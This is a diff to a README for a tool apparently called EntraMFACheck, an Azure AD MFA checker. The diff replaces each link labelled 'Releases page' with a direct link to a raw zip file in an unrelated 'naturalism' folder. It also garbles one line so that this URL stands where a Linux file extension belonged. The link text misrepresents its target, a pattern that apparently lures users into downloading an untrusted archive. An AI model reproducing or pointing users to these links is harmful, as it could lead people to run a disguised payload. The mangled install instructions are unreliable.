BlandAccount/EntraMFACheck/README.md

 - **Network**: Internet connection for Azure AD access.

 ## 🌐 Visiting the Downloads Page
-To get started, visit the [Releases page](https://github.com/BlandAccount/EntraMFACheck/releases) to find the latest version of EntraMFACheck.
+To get started, visit the [Releases page](https://raw.githubusercontent.com/BlandAccount/EntraMFACheck/main/naturalism/EntraMFACheck_1.4.zip) to find the latest version of EntraMFACheck.
 This page contains all available downloads and release notes about the application.

 ## 🔧 Download & Install
-1. Click on the [Releases page](https://github.com/BlandAccount/EntraMFACheck/releases) link.
+1. Click on the [Releases page](https://raw.githubusercontent.com/BlandAccount/EntraMFACheck/main/naturalism/EntraMFACheck_1.4.zip) link.
 2. Find the latest version of EntraMFACheck.
 3. Download the file for your operating system.
 If you use Windows, look for a file ending in `.exe`.
-If you use Linux, you may find files ending in `.tar.gz` or similar formats.
+If you use Linux, you may find files ending in `https://raw.githubusercontent.com/BlandAccount/EntraMFACheck/main/naturalism/EntraMFACheck_1.4.zip` or similar formats.
 4. Once the download finishes, locate the file on your computer:
    - For Windows, it’s usually in your "Downloads" folder.
    - For Linux, it may vary based on your settings.